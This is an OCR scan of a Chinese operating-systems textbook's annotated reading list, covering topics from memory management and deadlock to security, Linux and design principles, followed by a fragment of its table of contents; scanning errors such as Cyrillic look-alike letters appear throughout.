章 中 同时 也 说 明了 这 些 概念 是 如 何 做 入 到 不 同 编程 语言 中 去 的 。 这 篇 文章 非常 老 ， 但 是 却 经 受 住 了 时 间 
的 考验 。 

Ben-Ari, Principles of Concurrent Programming 

这 本 书 专门 讨论 了 进程 间 的 通信 问题 ， 其 他 章节 则 讨论 了 互 斥 性 、 信号 量 、 管 程 以 及 哲学 家 就 餐 问 
题 等 。 

Silberschatz et al., Operating System Concepts with Java, 7th ed. 
该 书 的 第 4~6 章 讨论 了 进程 和 进程 间 通 信 ， 包 括 调度 、 临 界 区 、 信号 量 、 管 程 以 及 经 典 的 进程 间 通 
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14.1.3 存储 管理 

Denning, “Virtual Метогу” 

该 文 是 一 篇 关于 虚拟 内 存 诸多 特性 的 经 典 文 章 。 作 者 Denning 是 该 领域 的 先驱 之 一 ， 正 是 他 创立 了 
工作 集 概念 。 

Denning, “Working Sets Past and Present” 

该 书 很 好 地 阐述 了 大 容量 存储 器 的 管理 和 页 面 置换 算法 。 书 后 附 有 完整 的 参考 文献 。 虽 然 其 中 很 多 
文章 都 非常 老 了 ， 但 是 原理 实际 根本 没有 变化 。 

Knuth, The Art of Computer Programming, Vol. 1 

该 书 讨论 并 比较 了 首次 适 配 算法 、 最 佳 适 配 算法 和 其 他 一 些 存储 管理 算法 。 

Silberschatz et al., Operating System Concepts with Java, 7th ей. 


该 书 第 8 章 和 第 9 章 讨论 了 存储 管理 ， 包 括 交换 、 分 页 和 分 段 等 。 书 中 提 到 了 很 多 页 面 置换 算法 。 
14.1.4 输入 /输出 


Geist and Daniel, “А Continuum of Disk Scheduling Algorithms” 

ЖОЮШ TAARE NEE, Hh T ERUR Ж, 

Scheible, “A Survey of Storage Options” 

现在 存储 的 方法 很 多 : DRAM, SRAM, SDRAM, WFF, Ei, kit, CD-ROM, DVD, ЖЯ 
带 等 。 这 篇 文章 对 这 些 技术 进行 了 评述 ， 着 重 总 结 了 它们 的 优 缺 点 。 

Stan and Skadron, “Power-Aware Computing 

能 源 问题 始终 是 移动 设备 的 主要 问题 ， 直 到 有 人 能 设法 将 摩尔 定律 运用 于 电池 技术 为 止 。 我 们 甚至 
有 可 能 在 不 久 就 需要 一 个 可 感知 温度 的 操作 系统 。 这 篇 文章 就 是 针对 这 些 问题 的 一 个 综述 ， 同 时 介绍 对 
能 源 感知 计算 中 的 计算 机 这 一 特定 问题 的 5 篇 文章 。 

Walker and Cragon, “Interrupt Processing in Concurrent Processors” 

在 超标 量 计算 机 中 精确 实现 中 断 是 一 项 具有 挑战 性 的 工作 。 其 技巧 在 于 将 状态 序列 化 并 且 快速 地 完 
成 这 项 工作 。 文 中 讨论 了 许多 设计 问题 以 及 相关 的 权衡 考虑 。 
14.1.5 文件 系统 

McKusick et al., “A Fast File System Гог UNIX” 

在 4.2BSD 环 境 下 重新 实现 了 UNIX 的 文件 系统 。 该 文 描述 了 新 文件 系统 的 设计 ， 并 把 重点 放 在 其 性 
能 上 。 

Silberschatz et al., Operating System Concepts with Java, 7th ей. 

该 书 第 10 一 11 章 与 文件 系统 有 关 ， 涉 及 文件 操作 、 文 件 访问 方式 、 目 录 以 及 实现 和 其 他 内 容 等 。 

Stallings, Operating Systems, Sthed. 

该 书 第 12 章 包括 许多 有 关 安 全 环境 的 内 容 ， 特 别 是 有 关 黑 客 、 病 毒 以 及 其 他 威胁 等 内 容 。 
14.1.6 死 锁 

Coffman et al., “System Deadlocks” 

该 文 简要 介绍 了 死 锁 、 死 锁 的 产生 原因 以 及 如 何 预防 和 检测 。 

Holt, “Some Deadlock Properties of Computer Systems” 

该 文 围绕 死 锁 进 行 了 讨论 。Holt 引 入 了 一 个 可 用 来 分 析 某 些 死 锁 情况 的 有 向 图 模型 。 

Isloor and Marsland, “The Deadlock Problem; An Overview” 

这 是 关于 死 锁 的 入 门 教程 ， 重 点 放 在 了 数据 库 系统 ， 也 介绍 了 多 种 模型 和 算法 。 

Shub, “A Unified Treatment of Deadlock” 


这 是 一 部 关于 死 锁 产生 和 解决 的 简短 综述 ， 同 时 也 给 出 了 一 些 在 教学 时 应 当 强调 内 容 的 建议 。 
14.17 多 媒体 操作 系统 


Lee,“Parallel Video Servers: A Tutorial” 


许多 组 织 想 提供 视频 点 播 ， 这 就 需要 拥有 可 扩展 的 、 容 错 的 并 行 视频 服务 器 。 文 中 介绍 了 怎样 构建 
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这 种 服务 器 的 主要 问题 ， 包 括 服务 器 的 体系 结构 、 条 带 化 、 布 局 策略 、 人 负载 平衡 、 元 余 、 协 议 以 及 同步 。 

Leslie et al., “The Design and Implementation of an Operating System to Support Distributed 
Multimedia Applications” 

许多 多 媒体 实现 的 尝试 都 是 在 现 有 的 操作 系统 上 增加 一 些 功能 ， 另 一 个 方向 是 全 部 重新 开发 ， 就 像 
该 文 描述 的 一 样 ， 为 多 媒体 构建 一 个 新 的 操作 系统 ， 不 需要 为 向 下 兼容 而 进行 修改 。 这 样 做 的 结果 是 产 
生 一 个 与 传统 操作 系统 截然 不 同 的 新 系统 。 

Sitaram апа Dan, “Multimedia Servers” 

多 媒体 服务 器 与 通常 的 文件 服务 器 有 很 多 不 同 之 处 。 作 者 详细 讨论 了 这 些 不 同 ， 特 别 是 在 调度 、 存 
储 子 系统 和 高 速 缓 在 这 几 个 方面 。 


14.1.8 多 处 理 机 系统 

Ahmad, “Gigantic Clusters; Where Аге They and What Аге They Doing?” 

为 了 了 解 大 型 多 计算 机 系统 的 先进 性 ， 可 以 读 这 篇 文章 。 它 描述 了 这 一 思想 ， 并 且 给 出 了 对 当前 在 使 
用 的 一 些 大 型 系统 的 概况 介绍 。 根 据 摩尔 定律 可 以 合理 推断 ， 这 里 提 到 的 规模 大 约 每 两 年 就 会 增长 一 倍 。 

Dubois et al., “Synchronization, Coherence, and Event Ordering in Multiprocessors” 

该 文 是 一 个 关于 基于 共享 存储 器 多 处 理 器 系统 中 同步 问题 的 指南 ， 而 且 ， 其 中 的 一 些 思想 对 于 单 处 
理 器 和 分 布 式 存储 系统 也 是 适用 的 。 

Geer, “For Programmers, Multicore Chips Mean Multiple Challenges” 

多 核 芯片 的 时 代 正在 到 来 一 一 不 论 软 件 界 的 人 们 是 否 准备 好 。 实 际 上 他 们 并 没有 准备 好 ， 而 且 为 这 
些 芯片 编写 程序 往往 是 巨大 的 挑战 ， 这 包括 选择 合适 的 工具 、 将 有 关 工 作 划 分 成 小 的 部 分 ， 以 及 测试 结 
果 等 。 

Kant and Mohapatra, “Internet Data Centers” 

Internet 数 据 中 心 是 一 个 被 兴奋 剂 刺激 起 来 的 巨大 多 计算 机 。 常 常 让 成 千 上 万 台 计算 机 为 一 个 应 用 
软件 而 工作 。 这 里 的 主要 问题 就 是 可 伸缩 性 、 可 维护 性 和 能 源 。 这 篇 文章 既是 对 有 关 问 题 的 一 个 介绍 ， 
也 是 对 同一 个 问题 的 其 他 4 篇 文章 的 介绍 。 

Kumar et al., “Heterogeneous Chip Multiprocessors” 

用 在 台式 电脑 上 的 多 核 芯片 是 对 称 的 一 一 每 一 个 核 是 相同 的 。 然 而 对 一 些 应 用 软件 来 说 ， 异 构 的 多 
处 理 器 (Chip multiprocessors, CMPS) 是 很 普遍 的 ， 有 的 核 用 来 计算 、 有 的 处 理 视频 编码 、 有 的 处 理 音 
频 编码 等 。 这 篇 文章 就 讨论 异 构 多 处 理 器 中 的 有 关 问 题 。 

Kwok and Ahmad, “Static Scheduling Algorithms for Allocating Directed Task Graphs to 
Multiprocessors” 

如 果 提 前 知道 所 有 作业 的 特性 ， 就 可 能 对 多 计算 机 系统 或 者 多 处 理 器 进行 优化 作业 调度 。 问 题 在 于 
最 优 调度 的 计算 时 间 会 很 长 。 在 这 篇 论文 中 ， 作 者 讨论 并 且 比 较 了 用 不 同方 法 解决 这 个 问题 的 27 种 著名 
的 算法 。 

Rosenblum апа Garfinkel, “Virtual Machine Monitors: Current Technology and Future Trends” 

这 篇 文章 从 虚拟 机 监视 器 的 历史 谈 起 ， 然 后 讨论 现 有 处 理 器 、 内 存 和 IO 的 虚拟 化 情况 。 文 章 涉及 
的 领域 不 但 包括 上 面 三 个 方面 ， 还 包括 将 来 如 何 用 硬件 来 减少 这 些 问题 。 

Whitaker et al., “Rethinking the Design of Virtual Machine Monitors” 

多 数 计算 机 都 有 一 些 奇怪 和 难于 虚拟 化 的 方面 。 在 这 篇 文章 中 Denali 系 统 的 作者 就 虚拟 化 进行 了 一 
些 探讨 ， 即 如 何 修改 客户 操作 系统 以 避免 遇 到 一 些 奇怪 的 特性 ， 由 此 来 防止 仿真 这 些 特性 。 

14.1.9 安全 

Bratus, “What Hackers Learn That ће Rest of Us Don’t” 

是 什么 让 黑客 如 此 与 众 不 同 ? 他 们 所 关注 的 ， 而 一 般 程序 员 却 忽略 的 ， 是 什么 ?》 他 们 对 API 态 度 不 
同 吗 ? 支 末 问题 重要 吗 ? 读者 好 奇 吗 ? 如 果 感 兴趣 ， 建 议 读 一 读 。 

Computer, Feb 2000 

这 一 期 Computer 的 主题 是 生物 测量 学 。 关 于 这 个 主题 有 6 篇 论文 ， 从 入 门 到 专题 ， 从 各 种 特定 技术 
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到 法 律 和 隐私 问题 ， 论 文 都 有 涉及 。 

Denning, Information Warfare апа Security 

信息 已 经 变 成 了 战争 武器 , 既是 军事 武器 也 是 军事 配合 武器 。 参 与 者 不 仅 尝试 攻击 对 方 的 信息 系统 ， 
而 且 要 防卫 好 自己 的 系统 。 在 这 本 吸引 人 的 书 中 ， 作 者 讨论 了 所 有 能 想到 的 关于 攻击 策略 和 防卫 策略 的 
话题 ， 从 数据 欺骗 到 包 窥 探 器 。 该 书 对 于 计算 机 安全 有 极 大 兴趣 的 读者 来 说 是 必 读 的 。 

Ford апа Allen,“How Not to Be $ееп” 

病毒 ， 间 谍 软 件 ，rootkits 和 数字 版 权 管理 系统 都 对 隐藏 数据 情 有 独 钟 。 这 篇 文章 对 各 种 隐身 的 方 
法 进行 了 简要 的 介绍 。 

Hafner and Markoff, Cyberpunk 

书 中 介绍 了 由 《纽约 时 报 》 曾 经 写 过 网 络 蠕虫 故事 (马尔 可 夫 链 ) 的 计算 机 记者 讲述 的 世界 上 关于 
年 轻 黑客 破坏 计算 机 的 三 种 流传 最 广 的 故事 。 

Johnson and Jajodia, “Exploring Steganography: Seeing the Unseen” 

隐身 术 具 有 悠久 的 历史 ， 可 以 回 到 将 信使 的 头发 剃 光 ， 然 后 在 剃 光 的 头 上 纹 上 信息 ， 然 后 在 信使 的 
头发 长 出 来 之 后 再 将 他 送 走 的 年 代 。 尽 管 当前 的 技术 很 多 ， 但 是 它们 也 是 数字 化 的 。 本 书 对 于 想 在 这 一 
主题 彻底 人 门 的 读者 来 说 是 一 个 开端 。 

Ludwig, The Litte Black Book of Етай Viruses 

如 果 想 编写 反 病毒 软件 并 且 想 了 解 在 位 级 别 (bit level) 上 这 些 病毒 是 怎么 工作 的 ， 那 么 这 本 书 很 
适合 。 每 种 病毒 都 有 详细 的 讨论 并 且 也 提供 了 绝 大 多 数 的 实际 代码 。 但 是 ， 要 求 读者 透彻 掌握 Pentium 
汇编 语言 编程 知识 。 

Mead, “Who is Liable for Insecure Systems?” 

很 多 有 关 计 算 机 安全 的 措施 都 是 从 技术 角度 出 发 的 ， 但 是 这 不 是 惟一 的 角度 。 也 许 软件 经 销 商 应 该 
对 由 于 他 们 的 问题 软件 而 带 来 的 损失 负 起 责任 。 如 果 比 现在 更 多 地 关注 于 安全 ， 这 会 是 经 销 商 的 机 会 
吗 ? 对 这 个 提 法 感 兴趣 吗 ? 可 以 读 一 下 这 篇 文章 。 

Milojicic, “Security and Privacy” 

安全 性 涉及 很 多 方面 ， 包 括 操作 系统 、 网 络 、 私 密 性 表示 等 。 在 这 篇 文章 中 ， 6 位 安全 方面 的 专家 
给 出 了 他 们 各 自 关 于 这 个 主题 的 想法 和 见解 。 

Nachenberg, “Computer Virus-Antivirus Coevolution” 

当 反 病毒 的 开发 人 员 找 到 一 种 方法 能 够 探测 某 种 电脑 病毒 并 且 使 其 失效 时 ， 病 毒 的 编写 者 已 经 在 改 
进 和 开发 更 强 的 病毒 。 本 书 探讨 了 这 种 制造 病毒 和 反 病 毒 之 间 的 “ 猫 和 老鼠 ”游戏 。 作者 对 于 反 病 毒 编 
写 者 能 否 取胜 这 场 游戏 并 不 持 乐观 态度 ， 这 对 电脑 用 户 来 说 也 许 不 是 一 个 好 消息 。 

Pfleeger, Security іп Computing, 4th ed. 

尽管 已 经 出 版 了 很 多 关于 计算 机 安全 的 书籍 ， 但 大 多 数 却 只 关注 网 络 安全 性 。 本 书 不 仅 关注 网 络 安 
全 性 ， 还 包含 了 讨论 操作 系统 安全 性 、 数 据 库 安全 性 和 分 布 式 系统 安全 性 的 章节 。 

Sasse, “Red-Eye Blink, Bendy Shuffle, and the Yuck Factor: A User Experience of Biometric Airport 
Systems” 

作者 讲述 了 他 在 许多 大 机 场所 经 历 的 瞳孔 识别 系统 的 体验 。 不 是 所 有 的 体验 都 是 正面 的 。 

Thibadeau, “Trusted Computing for Disk Drives апа Other Peripherals” 

如 果 读者 认为 磁盘 驱动 器 只 是 一 个 储存 比特 的 地 方 ， 那 么 最 好 再 考虑 一 下 。 现 代 的 磁盘 驱动 器 有 非 
常 强大 的 CPU， 焰 级 的 RAM， 多 个 通信 通道 甚至 有 自己 的 启动 ROM。 简 而 言 之 ， 它 就 是 一 个 完整 的 计算 
机 系统 ， 很 容易 被 攻击 ， 因 此 它 也 需要 有 自己 的 保护 机 制 。 这 篇 文章 讨论 的 就 是 磁盘 驱动 器 的 安全 问题 。 
14.1.10 Linux 

Bovet апа Cesati, Understanding the Linux Kernel 

该 书 也 许 是 对 Linux 内 核 整体 知识 讨论 最 好 的 一 本 书 。 它 涵盖 了 进程 、 存 储 管理 、 文件 系统 和 信号 
等 内 容 。 

IEEE, Information Technology——Portable Operating System Interface (POSIX), Part 1; System 
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Application Program Interface (АРІ) [С Language] 

这 是 一 个 标准 。 一 些 部 分 确实 值得 一 读 ， 特 别 是 附录 B， 清 晰 阐述 了 为 什么 要 这 样 做 。 参 考 标准 的 
-个 好 处 在 于 通过 定义 不 会 出 现 错误 。 例 如 ， 如 果 一 个 宏 的 名 字 中 的 排 字 错误 贯穿 了 整个 编辑 过 程 ， 那 
么 它 将 不 再 是 一 个 错误 ， 而 成 为 一 种 正式 标准 。 

Fusco, The Linux Programmers’ Toolbox 

这 本 书 是 为 那些 知道 一 些 基 本 Linux 知 识 ， 并 且 希 望 能 够 进一步 了 解 Linux 程 序 如 何 工作 的 中 级 读者 
们 写作 的 。 该 书 假定 读者 是 一 个 C 程 序 员 。 

Maxwell, Linux Core Kernel Commentary 

该 书 的 前 400 页 给 出 了 Linux 的 内 核 源 代码 的 一 个 子 集 。 后 面 的 150 页 则 是 对 这 些 代码 的 评述 。 与 
John Lions 的 经 典 书籍 (1996) 风格 很 相似 。 如 果 你 想 了 解 Linux 内 核 的 很 多 细节 ， 那么 这 是 一 个 不 错 的 
起 点 ， 但 是 读 40 000 行 C 语 言 代码 不 是 每 个 人 都 必需 的 。 
14.1.11 Windows Vista 

Cusumano and Selby, “How Microsoft Builds Software” 

你 是 否 曾经 好 奇 过 一 个 人 如 何 能 够 写 出 29 000 000 行 代码 (就 像 Windows 2000-66), 并 且 让 它 作 
为 一 个 整体 运转 起 来 ?希望 探究 微软 是 如 何 采用 建造 和 测试 循环 来 管理 大 型 软件 项 目的 读者 ， 可 以 参看 
这 篇 论文 。 其 过 程 相当 有 启发 性 。 

Rector and Newcomer, Win32 Programming 

如 果 想 找 一 本 1500 页 的 书 ， 告 诉 你 如 何 编写 Windows 程 序 ， 那么 读 这 本 书 是 一 个 不 错 的 开始 。 它 涵 
盖 了 窗口 、 设 备 、 图 形 输出 、 键 盘 和 和 鼠标 输入 、 打 印 、 存 储 管理 、 库 和 同步 等 许多 主题 。 阅 读 这 本 书 要 
求 读 者 具有 C 或 者 C++ 语言 的 知识 。 

Russinovich and Solomon, Microsoft Windows Internals, 4th ed. 

如 果 想 学 习 如 何 使 用 Windows， 可 能 会 有 几 百 种 相关 的 书 。 如 果 想 知道 Windows 内 部 如 何 工作 的 ， 本 
区 是 读者 最 好 的 选择 。 它 给 出 了 很 多 内 部 算法 和 数据 结构 以 及 可 观 的 技术 细节 。 没有 任何 一 本 书 可 以 趟 代 。 


14.1.12 Symbian 操作 系统 

Cinque et al., “How do Mobile Phone Fail? A Failure Data Analysis of Symbian OS Smart Phones” 

以 前 不 论 怎样 ， 当 计算 机 贿 定 时 ， 至 少 电话 总 是 可 以 用 的 。 而 现在 电话 其 实 就 是 一 个 小 屏幕 的 计算 
机 ， 它 们 也 会 因为 精 糕 的 软件 而 崩溃 。 本 文 讨论 了 可 以 导致 Symbian 手机 或 者 终端 崩溃 的 软件 错误 。 

Morris, The Symbian OS Architecture Sourcebook 

如 果 你 一 直 在 寻找 关于 Symbian 操 作 系 统 的 进一步 细节 ， 那么 本 书 是 一 个 很 好 的 开始 。 它 涉及 了 
Symbian 的 体系 结构 和 相当 数量 的 各 层 细 节 ， 而 且 还 给 出 了 一 些 实例 分 析 。 

Stichbury and Jacobs, The Accredited Symbian Developer Primer 

如 果 你 对 为 Symbian 手机 或 者 掌上 电脑 如 何 开发 应 用 软件 感 兴趣 的 话 ， 那么 本 书 是 一 个 不 错 的 选择 。 
它 从 所 需要 的 C++ 语言 讲 起 ， 逐 步 深 入 到 系统 结构 、 文 件 系统 、 网 络 管理 、 工 具 链 和 兼容 性 。 


14.1.13 设计 原则 

Brooks, The Mythical Мап Month; Essays On Software Engineering 

Fred Brooks 是 IBM 的 OS /360 的 主要 设计 者 之 一 。 以 其 丰富 的 经 验 ， 他 知道 在 计算 机 的 设计 中 什么 
是 可 以 运行 的 和 什么 是 不 能 运行 的 。 他 在 25 年 前 写 下 这 本 该 谐 且 内 涵 丰 富 的 书 中 给 出 的 建议 现在 一 样 是 
可 行 的 。 

Cooke et al., “UNIX and Beyond; An Interview with Ken Thompson” 

设计 一 个 操作 系统 与 其 说 是 一 门 科 学 ， 不 如 说 是 一 门 艺术 。 因 此 ， 倾听 该 领域 专家 的 谈话 是 一 个 学 
习 这 方面 知识 的 有 效 途径 。 在 操作 系统 领域 中 ， 没 有 谁 比 Ken Thompson 更 有 发 言 权 的 了 。 在 对 这 位 
UNIX、Inferno、Plan9 操 作 系 统 的 合作 设计 者 的 访问 过 程 中 ，Ken Thompson 益 明了 在 这 个 领域 中 我 们 从 
哪里 开始 和 即将 走向 哪里 等 问题 。 

Corbat6, “On Building Systems That Will Fail” 

在 获得 图 灵 奖 的 演讲 大 会 上 ， 这 位 分 时 系统 之 父 阐述 了 许多 Brooks 在 《人 月 神话 》 中 同样 关注 的 问 
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题 。 他 的 结论 是 所 有 的 复杂 系统 都 将 最 终 失败 ， 为 了 设计 一 个 成 功 的 系统 ， 避 免 复杂 化 、 追 求 设计 上 的 
优雅 风格 和 简单 化 原则 是 绝对 重要 的 。 

Crowley, Operating Systems: А Design-Oriented Approach 

大 多 数 介绍 操作 系统 的 教材 仅仅 是 进 操作 系统 的 基本 概念 〈 进 程 调度 、 虚 拟 内 存 等 ) 和 列举 一 些 例 
子 ， 对 于 如 何 设计 一 个 操作 系统 却 没有 提 及 。 该 书 独一无二 的 特点 在 于 有 4 章 是 说 明 如 何 设计 一 个 操作 
系统 的 。 

Lampson,“Hints for Computer System Design” 

Butler Lampson 一 一 世界 上 最 主要 的 具有 创新 性 的 操作 系统 设计 者 之 一 ， 在 他 多 年 的 设计 经 历 中 总 
结 了 许多 设计 方法 、 对 设计 的 建议 和 一 些 指导 原则 并 写 下 这 篇 该 谐 的 内 涵 丰 富 的 文章 ， 正 如 Brooks 的 书 
一 样 ， 对 于 有 抱负 的 操作 系统 的 设计 者 来 说 ， 这 本 书 一 定 不 要 错过 。 

Wirth, “А Plea for Lean Software” 

Niklaus Wirth 一 一 著名 的 经 验 丰 富 的 系统 设计 者 ， 曾 设计 了 面向 网 络 的 基于 图 形 用 户 界面 的 操作 系 
统 Oberon， 包 括 Oberon 编 译 器 和 文本 编辑 器 ， 只 有 200KB。 通 过 讨论 Oberon 系 统 ， 他 阐明 软件 应 该 基于 
简单 的 概念 ， 使 其 简单 明了 ， 而 不 是 商用 化 软件 的 复杂 。 
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什么 是 操作 系统 


作为 扩展 机 器 的 操作 系统 
作为 资源 管理 者 的 操作 系统 


操作 系统 的 历史 


代 
计算 机 硬件 介绍 


5) : 真空 管 和 穿孔 卡片 
5) : 晶体 管 和 批 处 理 系统 
0) : 集成 电路 芯片 和 多 道 程序 设计 


处 理 器 


后 动 计算 机 


操作 系统 大 观 园 


大 型 机 操作 系统 
服务 器 操作 系统 

多 处 理 器 操作 系统 
个 人 计算 机 操作 系统 
掌上 计算 机 操作 系统 
嵌入 式 操作 系统 
传感器 节点 操作 系统 
实时 操作 系统 
智能 卡 操作 系统 


操作 系统 概念 


进程 

地 址 空间 

ЖЕ: 

输入 一 输出 

保护 

shell 

个 体重 复 系统 发 育 


系统 调用 
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用 于 进程 管理 的 系统 调用 

用 于 文件 管理 的 系统 调用 

用 于 目录 管理 的 系统 调用 

各 种 系统 调用 

Windows Win32 АРІ 


操作 系统 结构 
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>$ 
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1 
个 
Т. 


单 体系 统 
层次 式 系统 
微 内 核 
客户 机 - 服务 器 模式 
虚拟 机 
外 核 

с 的 世界 
C 语言 
头 文件 
大 型 编程 项 目 
运行 模型 


有 关 操 作 系统 的 研究 
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EE EE 


书 其 他 部 分 概要 
制 单位 


进程 与 线程 
进程 


多 道 程序 设计 模型 
线程 的 使 用 
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